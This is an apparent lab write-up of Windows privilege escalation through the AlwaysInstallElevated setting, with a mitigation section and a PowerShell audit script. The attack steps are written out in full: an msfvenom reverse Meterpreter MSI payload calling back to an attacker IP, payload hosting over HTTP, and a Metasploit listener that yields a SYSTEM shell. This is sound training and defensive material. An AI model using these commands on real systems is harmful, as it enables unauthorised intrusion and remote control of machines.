Exploiting AlwaysInstallElevated for Windows Privilege Escalation
🧠 Summary
In this walkthrough, I exploited the AlwaysInstallElevated privilege escalation technique on a vulnerable Windows machine. When both the HKLM and HKCU registry keys for AlwaysInstallElevated are set to 1, any .msi file executed by a standard user will run with SYSTEM-level privileges. Below is a step-by-step breakdown of how I leveraged this misconfiguration to gain SYSTEM access.
🔍 Step 1: Confirming Registry Vulnerability
After gaining initial access to the target machine, I checked the registry for AlwaysInstallElevated values:
reg query HKLM\Software\Policies\Microsoft\Windows\Installer
reg query HKCU\Software\Policies\Microsoft\Windows\Installer

Both were set to 0x1, confirming the system is vulnerable.
💣 Step 2: Creating a Malicious MSI Payload
On my Kali attack box, I generated a reverse Meterpreter payload in MSI format using msfvenom:
msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.2.119.123 -f msi -o setup.msi

🌐 Step 3: Hosting the Payload
I used Python to host the .msi file over HTTP:
python3 -m http.server 80

📥 Step 4: Downloading and Executing on Victim Machine
On the victim machine, I opened Internet Explorer and navigated to the Kali host IP to download the payload.


🧠 Step 5: Listener Setup and Shell Access
On my Kali box, I launched a Metasploit listener to catch the reverse shell:
msfconsole
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST 10.2.119.123
run

The payload executed with SYSTEM privileges, as confirmed by the getuid command.
🛡️ Mitigation
To prevent this type of privilege escalation:
- Set AlwaysInstallElevated to 0 in both HKLM and HKCU:
  reg add HKLM\Software\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated /t REG_DWORD /d 0 /f
  reg add HKCU\Software\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated /t REG_DWORD /d 0 /f
- Restrict user ability to run .msi installers
- Use endpoint monitoring to alert on privilege escalations
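To make both the Step 1 check and the mitigation repeatable, here is an added PowerShell audit script (my own example, not part of the original walkthrough or of any Microsoft tooling). It reads the AlwaysInstallElevated value from both hives, flags the host only when both are set to 1 (the condition required for the escalation), and with the assumed -Remediate switch forces both values to 0. The function and switch names are my own choices.

```powershell
# Added example (not from the original walkthrough): audit and optionally
# remediate the AlwaysInstallElevated policy values in HKLM and HKCU.
# Run from an elevated PowerShell session; writing to HKLM needs admin rights.
[CmdletBinding()]
param(
    [switch]$Remediate   # assumed switch name: set both values to 0 when present
)

$keys = @(
    'HKLM:\SOFTWARE\Policies\Microsoft\Windows\Installer',
    'HKCU:\SOFTWARE\Policies\Microsoft\Windows\Installer'
)
$valueName = 'AlwaysInstallElevated'

function Get-AlwaysInstallElevatedState {
    # Returns one object per hive with the current value, or $null if the
    # key or value is absent (absent means the policy is not enabled there).
    foreach ($key in $keys) {
        $value = $null
        if (Test-Path $key) {
            $props = Get-ItemProperty -Path $key -ErrorAction SilentlyContinue
            if ($null -ne $props -and $props.PSObject.Properties.Name -contains $valueName) {
                $value = [int]$props.$valueName
            }
        }
        [pscustomobject]@{
            Hive  = $key.Split(':')[0]
            Key   = $key
            Value = $value
        }
    }
}

$state = @(Get-AlwaysInstallElevatedState)
$state | Format-Table -AutoSize

# The escalation path exists only when BOTH hives carry the value 1.
$enabledCount = @($state | Where-Object { $_.Value -eq 1 }).Count
if ($enabledCount -eq $keys.Count) {
    Write-Warning "$valueName is 1 in both HKLM and HKCU: standard users can run MSI packages as SYSTEM."
} else {
    Write-Host "$valueName is not enabled in both hives; the misconfiguration is not present."
}

if ($Remediate) {
    foreach ($key in $keys) {
        # Create the policy key if it is missing, then force the value to 0.
        if (-not (Test-Path $key)) { New-Item -Path $key -Force | Out-Null }
        Set-ItemProperty -Path $key -Name $valueName -Value 0 -Type DWord
        Write-Host "Set $valueName = 0 under $key"
    }
}
```

Run it without arguments to audit, or with -Remediate to apply the same fix as the reg add commands above. If the setting is delivered by Group Policy ("Always install with elevated privileges" under Windows Installer, in both Computer Configuration and User Configuration), a local registry write will be overwritten at the next policy refresh, so the change must be made at the policy source. For the monitoring bullet, MsiInstaller events in the Application log are the natural place to correlate installs started by non-administrative users.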
🔗 MITRE ATT&CK Mapping
- T1548.002 – Abuse Elevation Control Mechanism: Bypass User Account Control
✅ Success: I escalated from user to SYSTEM by abusing AlwaysInstallElevated and a malicious MSI payload. Always validate registry settings during post-exploitation recon!
Stay sharp, and happy hacking! 🛠️